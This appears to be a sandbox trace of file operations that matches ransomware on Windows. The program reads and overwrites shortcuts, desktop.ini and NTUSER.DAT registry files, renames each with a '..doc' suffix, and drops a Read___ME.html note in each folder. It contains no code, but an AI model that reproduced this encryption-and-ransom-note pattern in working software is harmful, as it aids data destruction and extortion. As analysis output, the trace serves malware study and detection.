File	Create	filename = C:\Users\Public\Documents\desktop.ini, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\Public\Documents\desktop.ini, type = size, size_out = 278	1	Fn
File	Read	filename = C:\Users\Public\Documents\desktop.ini, size = 8192, size_out = 278	1	Fn Data
File	Write	filename = C:\Users\Public\Documents\desktop.ini, size = 288	1	Fn Data
File	Write	filename = C:\Users\Public\Documents\desktop.ini, size = 32	1	Fn Data
File	Write	filename = C:\Users\Public\Documents\desktop.ini, size = 16	1	Fn Data
File	Write	filename = C:\Users\Public\Documents\desktop.ini, size = 128	1	Fn Data
File	Write	filename = C:\Users\Public\Documents\desktop.ini, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\Public\Documents\desktop.ini, destination_filename = C:\Users\Public\Documents\desktop.ini..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\Public\Documents\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\Public\Documents\Read___ME.html, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = C:\Users\Public\Documents\Read___ME.html, size = 4282	1	Fn Data
File	Create	filename = C:\Users\Public\Desktop\Acrobat Reader DC.lnk, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\Public\Desktop\Acrobat Reader DC.lnk, type = size, size_out = 2130	1	Fn
File	Read	filename = C:\Users\Public\Desktop\Acrobat Reader DC.lnk, size = 8192, size_out = 2130	1	Fn Data
File	Write	filename = C:\Users\Public\Desktop\Acrobat Reader DC.lnk, size = 2144	1	Fn Data
File	Write	filename = C:\Users\Public\Desktop\Acrobat Reader DC.lnk, size = 32	1	Fn Data
File	Write	filename = C:\Users\Public\Desktop\Acrobat Reader DC.lnk, size = 16	1	Fn Data
File	Write	filename = C:\Users\Public\Desktop\Acrobat Reader DC.lnk, size = 128	1	Fn Data
File	Write	filename = C:\Users\Public\Desktop\Acrobat Reader DC.lnk, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\Public\Desktop\Acrobat Reader DC.lnk, destination_filename = C:\Users\Public\Desktop\Acrobat Reader DC.lnk..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\Public\Desktop\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\Public\Desktop\Read___ME.html, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = C:\Users\Public\Desktop\Read___ME.html, size = 4282	1	Fn Data
File	Create	filename = C:\Users\Public\Desktop\desktop.ini, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\Public\Desktop\desktop.ini, type = size, size_out = 174	1	Fn
File	Read	filename = C:\Users\Public\Desktop\desktop.ini, size = 8192, size_out = 174	1	Fn Data
File	Write	filename = C:\Users\Public\Desktop\desktop.ini, size = 176	1	Fn Data
File	Write	filename = C:\Users\Public\Desktop\desktop.ini, size = 32	1	Fn Data
File	Write	filename = C:\Users\Public\Desktop\desktop.ini, size = 16	1	Fn Data
File	Write	filename = C:\Users\Public\Desktop\desktop.ini, size = 128	1	Fn Data
File	Write	filename = C:\Users\Public\Desktop\desktop.ini, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\Public\Desktop\desktop.ini, destination_filename = C:\Users\Public\Desktop\desktop.ini..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\Public\Desktop\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\Public\Desktop\Google Chrome.lnk, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\Public\Desktop\Google Chrome.lnk, type = size, size_out = 2338	1	Fn
File	Read	filename = C:\Users\Public\Desktop\Google Chrome.lnk, size = 8192, size_out = 2338	1	Fn Data
File	Write	filename = C:\Users\Public\Desktop\Google Chrome.lnk, size = 2352	1	Fn Data
File	Write	filename = C:\Users\Public\Desktop\Google Chrome.lnk, size = 32	1	Fn Data
File	Write	filename = C:\Users\Public\Desktop\Google Chrome.lnk, size = 16	1	Fn Data
File	Write	filename = C:\Users\Public\Desktop\Google Chrome.lnk, size = 128	1	Fn Data
File	Write	filename = C:\Users\Public\Desktop\Google Chrome.lnk, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\Public\Desktop\Google Chrome.lnk, destination_filename = C:\Users\Public\Desktop\Google Chrome.lnk..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\Public\Desktop\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\Public\Desktop\Mozilla Firefox.lnk, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\Public\Desktop\Mozilla Firefox.lnk, type = size, size_out = 1222	1	Fn
File	Read	filename = C:\Users\Public\Desktop\Mozilla Firefox.lnk, size = 8192, size_out = 1222	1	Fn Data
File	Write	filename = C:\Users\Public\Desktop\Mozilla Firefox.lnk, size = 1232	1	Fn Data
File	Write	filename = C:\Users\Public\Desktop\Mozilla Firefox.lnk, size = 32	1	Fn Data
File	Write	filename = C:\Users\Public\Desktop\Mozilla Firefox.lnk, size = 16	1	Fn Data
File	Write	filename = C:\Users\Public\Desktop\Mozilla Firefox.lnk, size = 128	1	Fn Data
File	Write	filename = C:\Users\Public\Desktop\Mozilla Firefox.lnk, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\Public\Desktop\Mozilla Firefox.lnk, destination_filename = C:\Users\Public\Desktop\Mozilla Firefox.lnk..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\Public\Desktop\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\Public\AccountPictures\desktop.ini, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\Public\AccountPictures\desktop.ini, type = size, size_out = 196	1	Fn
File	Read	filename = C:\Users\Public\AccountPictures\desktop.ini, size = 8192, size_out = 196	1	Fn Data
File	Write	filename = C:\Users\Public\AccountPictures\desktop.ini, size = 208	1	Fn Data
File	Write	filename = C:\Users\Public\AccountPictures\desktop.ini, size = 32	1	Fn Data
File	Write	filename = C:\Users\Public\AccountPictures\desktop.ini, size = 16	1	Fn Data
File	Write	filename = C:\Users\Public\AccountPictures\desktop.ini, size = 128	1	Fn Data
File	Write	filename = C:\Users\Public\AccountPictures\desktop.ini, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\Public\AccountPictures\desktop.ini, destination_filename = C:\Users\Public\AccountPictures\desktop.ini..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\Public\AccountPictures\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\Public\AccountPictures\Read___ME.html, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = C:\Users\Public\AccountPictures\Read___ME.html, size = 4282	1	Fn Data
File	Create	filename = C:\Users\Default\NTUSER.DAT, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\Default\NTUSER.DAT, type = size, size_out = 262144	1	Fn
File	Read	filename = C:\Users\Default\NTUSER.DAT, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT, size = 8192, size_out = 0	1	Fn
File	Write	filename = C:\Users\Default\NTUSER.DAT, size = 32	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT, size = 16	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT, size = 128	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\Default\NTUSER.DAT, destination_filename = C:\Users\Default\NTUSER.DAT..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\Default\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\Default\Read___ME.html, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = C:\Users\Default\Read___ME.html, size = 4282	1	Fn Data
File	Create	filename = C:\Users\Default\NTUSER.DAT.LOG1, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\Default\NTUSER.DAT.LOG1, type = size, size_out = 24576	1	Fn
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG1, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG1, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG1, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG1, size = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG1, size = 32	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG1, size = 16	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG1, size = 128	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG1, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\Default\NTUSER.DAT.LOG1, destination_filename = C:\Users\Default\NTUSER.DAT.LOG1..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\Default\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\Default\NTUSER.DAT.LOG2, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\Default\NTUSER.DAT.LOG2, type = size, size_out = 516096	1	Fn
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 32	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 16	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 128	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT.LOG2, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\Default\NTUSER.DAT.LOG2, destination_filename = C:\Users\Default\NTUSER.DAT.LOG2..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\Default\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf, type = size, size_out = 65536	1	Fn
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf, size = 8192, size_out = 0	1	Fn
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf, size = 32	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf, size = 16	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf, size = 128	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf, destination_filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TM.blf..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\Default\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, type = size, size_out = 524288	1	Fn
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
File	Read	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\Default\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000001.regtrans-ms, size = 8192	1	Fn Data
